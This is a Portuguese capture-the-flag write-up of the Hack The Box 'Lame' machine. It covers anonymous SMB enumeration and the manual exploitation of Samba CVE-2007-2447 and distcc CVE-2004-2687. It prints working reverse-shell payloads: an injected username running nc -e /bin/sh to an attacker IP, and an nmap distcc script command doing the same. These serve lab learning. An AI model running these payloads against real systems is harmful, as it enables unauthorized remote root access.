Lame - HTB Write Up - Anonimous SMB Login e DISTCC Exploit - CVE-2007-2447

Anonimous SMB Login e DISTCC Exploit - CVE-2007-2447

Enumeração dos serviços em execução no servidor Lame

NMAP Geral 

nmap -Pn -sV [IP]

nmap -Pn -T4 -p- --open [IP]

NMAP Específico para cada serviço

FTP

nmap -Pn -sC -p 21 [IP]

**Login anonimo permitido. No entanto, não é possível fazer upload de arquivo no FTP com esse acesso. 

**Execução do script ftp-vsftpd-backdoor e o resultado indica que o FTP não é vulnerável a CVE-2011-2523

SMB 

nmap -Pn -sC -p 445 [IP] 

**O resultado do scan no serviço SMB retorna a versão do SAMBA 3.0.20 e no security-mode mostra que usuário em branco é permitido. 

Usando smbclient é possível listar os compartilhamentos disponíveis. 

Outra informação interessante é mostrada, o login anonimo é permitido pelo serviço SAMBA SMBv1

Usando o crackmapexec é possível identificar a permissão de cada compartilhamento. 

crackmapexec smb [IP] -u "" -p "" --shares

Com smbclient é possível logar no compartilhamento /tmp com o session-null (ou login anonimo)

smbclient //[IP]/tmp -N

A versão do Samba 3.0.20 possui uma vulnerabilidade de execução remota de código publicada na CVE-2007-2447 e também possui exploit 16320

No código do exploit 16320 é possível encontrar o payload usado para explorar a falha no campo username, esse exploit é para ser usado no Metasploit. No entanto, o objetivo é executar a exploração de forma manual. 

O campo username do comando Logon do smbclient será explorado ao adicionar um código para shell-reversa, conforme é mostrado abaixo. 

logon "/=`nohup nc -nv 10.10.14.53 9090 -e /bin/sh`"

Conexão reversa estabelecida com a máquina do atacante. 

A sessão é estabelecida com usuaŕio root, garantindo assim acesso total ao servidor. 

Outro serviço vulnerável no mesmo servidor - DISTCCD - PORT 3632

O serviço DISTCC é usado para acelerar a compilação do código-fonte usando computação distríbuída em rede. Esse serviço tem uma vulnerabilidade publicada na CVE-2004-2687 onde na versão 2.x quando o serviço não restrige o acesso a port 3632, permite que remotamente seja possível executar comandos através do job de compilação, no qual é executado pelo servidor sem validar a autenticação. 

O NMAP possui um script para explorar a falha do serviço DISTCC, o comando para validar se o serviço é vulnerável é o seguinte:

nmap -p 3632 --script=distcc-cve2004-2687 [IP]

O comando para executar o exploit é o seguinte:

nmap -p 3632 [IP] --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv [IP-LOCAL] 9090 -e /bin/sh'"

Conexão estabelecida

No caso desse exploit, o acesso não é privilegiado, sendo necessário fazer o recon interno do servidor para elevar o privilégio. Nesse laboratório, não vou fazer o privilege escalation pois ao explorar o SMB com login anonimo, o acesso root já foi conquistado. 

Referências:

[+] Wikipédia DISTCC 

https://en.wikipedia.org/wiki/Distcc

[+] NMAP DOC 

https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html

[+] CVE-2007-2447

https://nvd.nist.gov/vuln/detail/CVE-2007-2447

[+] CVE-2004-2687

https://nvd.nist.gov/vuln/detail/CVE-2004-2687